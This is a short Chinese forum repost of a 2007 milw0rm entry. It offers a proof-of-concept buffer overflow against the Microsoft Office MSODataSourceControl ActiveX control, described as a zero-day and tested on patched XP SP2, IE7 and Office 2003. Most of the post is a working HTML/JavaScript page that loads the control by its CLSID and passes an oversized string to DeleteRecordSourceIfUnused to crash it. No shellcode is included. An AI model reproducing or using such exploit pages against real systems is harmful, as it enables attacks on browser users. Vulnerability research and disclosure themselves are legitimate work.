发新话题
打印

Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)

Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)

MSODataSourceControl.DeleteRecordSourceIfUnused COM-object B0F POC
Tested on full patched XP/SP2, IE7, MSO2003
复制内容到剪贴板
代码:
<html>
<object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}"></object>
<script language="javascript">
var b = &#39;AAAA&#39;;
while (b.length <= 256) b+=b;
ctl.DeleteRecordSourceIfUnused(b);
</script>
</html>
# milw0rm.com [2007-06-13]
--->  伱 能 領 導 潮 流.  我 可 領 導 全 賕!  <---

TOP

发新话题